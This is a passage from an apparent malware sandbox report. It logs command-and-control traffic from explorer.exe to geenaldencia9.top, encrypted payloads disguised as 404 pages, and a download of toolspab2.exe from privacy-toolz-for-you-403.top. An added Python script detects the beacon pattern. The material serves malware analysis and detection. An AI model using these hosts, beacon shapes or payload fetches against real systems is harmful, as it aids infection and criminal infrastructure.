                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 248
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:49.509605885 CEST | 15083 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:49 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.6 | 49824 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:49.588965893 CEST | 15084 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 201
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:49.870599985 CEST | 15086 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:49 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 34 38 36 61 30 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 af 7c 29 7d 0d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 59 69 d2 59 9e 87 cd 5f 87 78 51 a1 a2 8f 05 0a 82 1c e0 02 02 50 08 d8 de e2 30 a5 59 93 9b 87 4f f3 e0 e6 62 79 06 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 f1 fb 20 59 53 11 5c 94 6e 2f ab 49 11 80 cc 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 61 5b f2 8a 6f d9 06 0e 45 07 66 7d a4 56 e3 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 42 a7 49 11 fa bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 62 cd 7a 1c 17 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 66 f3 97 5e 70 9f 8a 86 e8 47 5a ad b2 cb 99 64 51 11 87 4a b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 64 95 5e 96 da 29 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 9c 42 a7 5f 5b f3 33 1a 4b 04 38 fd 79 14 2c d6 e8 b1 14 73 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 14 fd f6 f6 d1 d6 4a 8b f3 e9 4d 51 b2 49 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae 24 91 c9 73 bd 7b 9a 55 de df 4d 9e f8 d8 b2 4f 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 02 83 37 42 c2 1a ce ae 10 4b 95 56 b0 09 1d 47 4c 17 fa a7 a5 7b a6 de bb 8e 62 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 4f bd 44 8f ed ca 02 fc d2 d7 7b 22 a7 19 e0 57 
25 45 88 d0 ea 31 26 4a 08 79 54 7a 98 6c 39 c0 5e f3 5c 19 6e 63 95 be 67 3d da fa 10 77 47 11 89 d1 68 60 05 15 31 eb cd 8c 50 15 8e b1 82 7f 8e f8 f2 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 9d c6 83 01 49 42 dd ca 8b 21 10 a0 9c c5 62 87 bd f7 1f 67 09 a3 89 ef 22 85 2f 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 40 2c 0f 3a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 1c 19 26 c3 25 cd 57 0a 5e 5e df d3 23 40 84 88 38 ce 1c 14 f8 9f 95 bf 77 64 16 ed 8f 1f 8e 96 7a dc 7a a4 55 50 94 a4 45 b4 b5 61 b1 fc cf ba a3 0e
                                                                                                                                                                                                  Data Ascii: 486a02S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|)}+%YiY_xQP0YObyT=a'4 YS\n/IXKg[Ge92)g z6a[oEf}VWpJk"HBI?o|6NI[LeU[0z;+bz~5=PVf^pGZdQJV@q!Uvyd^):-C'GkKm@NB_[3K8y,sq"JG0Z"?kQTJMQId'\#&Q#F<pvA$s{UMOB%4VF>7BKVGL{b6'NGc_,OD{"W%E1&JyTzl9^\ncg=wGh`1PN!{K.iwIB!bg"/zR{}@,:HB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59&%W^^#@8wdzzUPEa
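Sessions 22 and 25 stand apart from the other check-ins in this block. The server still answers 404, but with Transfer-Encoding: chunked and a body that is binary from its first bytes (00 00 d2 a7 ...), not the 327-byte HTML error page returned in sessions 23, 24 and 26. The first chunk-size lines, 21802 and 486a02 in hex, declare 137,218 and 4,745,730 bytes respectively, so these "error pages" are sizeable downloads handed to explorer.exe in reply to a small form-encoded POST / whose Referer is the host itself. The script below is an added triage example; it is not part of the Joe Sandbox report and not code from the sample. It takes the request and response header blocks copied from session 22 with a constructed, truncated body, and flags (a) a response that declares text/html but carries a non-text body and (b) the check-in shape of the request. The 1 KiB body limit and the choice of explorer.exe as the unexpected client process are the example's own assumptions.

```python
import math
import re
from collections import Counter

# Constructed samples, not the report's PCAP. The header blocks are copied from
# session 22; the binary body is cut to the first bytes of that session's hex
# dump, so the chunk it declares (0x21802 bytes) is far larger than what is
# embedded here. The POST body itself is not shown in the dump.
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Referer: http://geenaldencia9.top/\r\n"
    b"Content-Length: 115\r\n"
    b"Host: geenaldencia9.top\r\n"
    b"\r\n"
)
SAMPLE_404_PAYLOAD = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Connection: close\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b"21802\r\n"
    + bytes.fromhex("0000d2a75328ca53575c2f8f69c15022ec26d8a1e7"
                    "26670b729086ecd2ca71c47cbe02d7363ff4659189")
)
_HTML_BODY = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
    b"<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n"
    b"<p>The requested URL / was not found on this server.</p>\r\n</body></html>\r\n"
)
SAMPLE_404_HTML = (  # a 404 with a genuine HTML body, as in sessions 23, 24 and 26
    b"HTTP/1.1 404 Not Found\r\nContent-Length: %d\r\nConnection: close\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n\r\n" % len(_HTML_BODY)
) + _HTML_BODY


def parse_http(raw: bytes):
    """Split a raw request or response into (start line, lowercased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def first_chunk_size(body: bytes):
    """Size declared by the first chunk-size line of a chunked body, or None."""
    m = re.match(rb"([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n", body)
    return int(m.group(1), 16) if m else None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: low for markup and text, close to 8 for encrypted or packed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def body_is_text(body: bytes) -> bool:
    """True only if the body decodes as UTF-8 and has no control bytes beyond tab, CR, LF."""
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch >= " " or ch in "\t\r\n" for ch in text)


def classify_response(raw: bytes) -> dict:
    """Flag a response whose headers claim text/* while the body is binary."""
    start, headers, body = parse_http(raw)
    status = int(start.split()[1])
    chunked = headers.get("transfer-encoding", "").lower() == "chunked"
    chunk = first_chunk_size(body) if chunked else None
    payload = body.split(b"\r\n", 1)[1] if chunk is not None else body
    declared_text = headers.get("content-type", "").lower().startswith("text/")
    text = body_is_text(payload)
    return {
        "status": status,
        "chunked": chunked,
        "first_chunk": chunk,
        "entropy": round(shannon_entropy(payload), 2),
        "text_body": text,
        # a 404 that is really a file download: declared HTML, delivered binary
        "suspicious": declared_text and not text,
    }


def is_beacon_request(raw: bytes, process: str) -> bool:
    """Match the check-in shape above: POST / with a self-referer and a small
    form-encoded body, sent by a process that has no business speaking HTTP."""
    start, headers, _ = parse_http(raw)
    method, path = start.split()[:2]
    host = headers.get("host", "")
    self_referer = headers.get("referer", "") == "http://%s/" % host
    form = headers.get("content-type", "").lower().startswith("application/x-www-form-urlencoded")
    small = int(headers.get("content-length", "0")) < 1024       # assumed limit
    odd_process = process.lower().endswith("\\explorer.exe")      # assumed process
    return method == "POST" and path == "/" and self_referer and form and small and odd_process
```

The verdict rests on the text/binary mismatch rather than on entropy alone: a short HTML page can sit close to the entropy of ciphertext, while NUL bytes and invalid UTF-8 under a text/html header are unambiguous. Against reassembled streams from the capture, the chunk size reported for sessions 22 and 25 is also the quickest way to see how much data an "error page" actually delivered.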


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.6 | 49829 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:01.249660015 CEST | 20020 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 232
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:35:01.520670891 CEST | 20021 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:01 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.6 | 49830 | 194.147.85.186 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:01.635981083 CEST | 20022 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 145
Host: geenaldencia9.top
Sep 27, 2021 19:35:02.057873011 CEST | 20023 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:35:01 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 32 63 31 36 30 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 ad 7c af 7c da 38 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 d1 9b 87 cd 99 8b 78 51 a1 a2 8f ca c0 97 1c e0 32 02 50 08 68 db e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 c1 f0 20 59 53 11 5c a9 d7 4a ab 48 11 80 cd 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 23 79 c2 8a 43 d8 06 0e 45 87 7f 7d 0d 04 e5 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 9e 70 9f 8a 86 e8 47 5a ad b2 cb 99 64 51 11 87 4a b1 b8 56 b0 40 f6 0a bf 8b 71 91 c0 75 f0 46 01 ff 56 59 27 64 5b 96 da 19 d1 3a 2d 32 42 06 02 23 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 40 d7 d8 03 f3 1e 7b d3 d5 57 4f 04 38 4d 7c 14 2c 6e e8 b1 14 eb 70 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 5a 50 bc a2 b7 f1 f6 6a 1f a7 e9 4d 51 82 48 64 cd 25 5c 8d b7 f3 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a4 ed e1 5a fc 37 bc 17 fe 2f 63 9e f8 d8 02 4e 42 25 e3 b5 be 34 04 99 46 3e 99 86 11 02 83 37 42 c2 1a ce ae 30 4b 95 f6 b0 09 1d 47 4c 17 fa a7 f6 9c 81 de bb ee 63 36 cf 13 27 4e e2 86 bc 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 6f bd 44 af 91 ff 27 b9 87 f9 5d 63 97 2b 9a 57 
25 55 b1 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 5e f3 5c 19 6e 63 95 be 67 3d da 7a 10 67 4d 12 92 b2 68 60 b9 82 12 eb cd dc 6d 15 8e 25 a1 7f 8e 2e b4 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af bd c6 83 21 35 71 e3 98 d0 66 52 80 07 62 61 87 bd b7 01 67 09 01 8a ef 22 3b 4d 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 20 2c 0f 1a 85 da 05 2b 95 cc fe 28 d5 fb 8f 82 42 57 43 85 d8 d4 14 79 a2 80 9f 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 92 13 3b 55 2c 68 68 99 a1 f5 6c 8d 81 ee d6 83 6f ce 81 3f ec 35 84 68 73 1e bf ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 88 63 77 8a 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 2b 94 0d 08 ce 93 a7 45 f3 5a 69 24 fe 18 68 07 d2 70 ec f1 e0 07 6a 48 08 92 21 a9 bc 22 bf 80 32 a3 14 2a 42 9f 2e 77 40 48 8a eb fc ec 4c 7c 1d b6
                                                                                                                                                                                                  Data Ascii: 2c1602S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8||8+%gtxQ2Ph0YObyT=a'4 YS\JHXKg[Ge92)g z6#yCE}WpJk"H2I?o|6NI[LeU[0z;+W~5=PVpGZdQJV@quFVY'd[:-2B#GkKm@@{WO8M|,np"JG0Z"?kQZPjMQHd%\!&Q#F<pvAZ7/cNB%4F>7B0KGLc6'NGc_,oD']c+W%UbJ}Tzl9^\ncg=zgMh`m%.N!{K.iw!5qfRbag";MzR{} ,+(BWCyw+;U,hhlo?5hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59+EZi$hpjH!"2*B.w@HL|


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.6 | 49831 | 194.147.85.186 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:05.832731009 CEST | 23020 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 316
Host: geenaldencia9.top
Sep 27, 2021 19:35:05.972934961 CEST | 23020 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:35:05 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 25
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
Data Ascii: No such file or directory


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.6 | 49832 | 194.147.85.186 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:06.071932077 CEST | 23021 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: geenaldencia9.top
Sep 27, 2021 19:35:06.317152023 CEST | 23022 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:35:06 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 25
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
Data Ascii: No such file or directory


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49771 | 194.147.85.186 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:20.619575977 CEST | 1611 | OUT | GET /downloads/toolspab2.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: privacy-toolz-for-you-403.top
Sep 27, 2021 19:34:20.746572018 CEST | 1613 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:34:20 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Mon, 27 Sep 2021 17:34:02 GMT
ETag: "20000-5ccfd80bdc4c3"
Accept-Ranges: bytes
Content-Length: 131072
Connection: close
Content-Type: application/octet-stream
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 04 b3 00 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 02 01 00 00 48 09 00 00 00 00 00 2c 1b 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 0a 00 00 04 00 00 f1 c4 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 51 01 00 4f 00 00 00 2c 49 01 00 3c 00 00 00 00 c0 09 00 f0 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 34 01 00 40 00 00 00 00 00 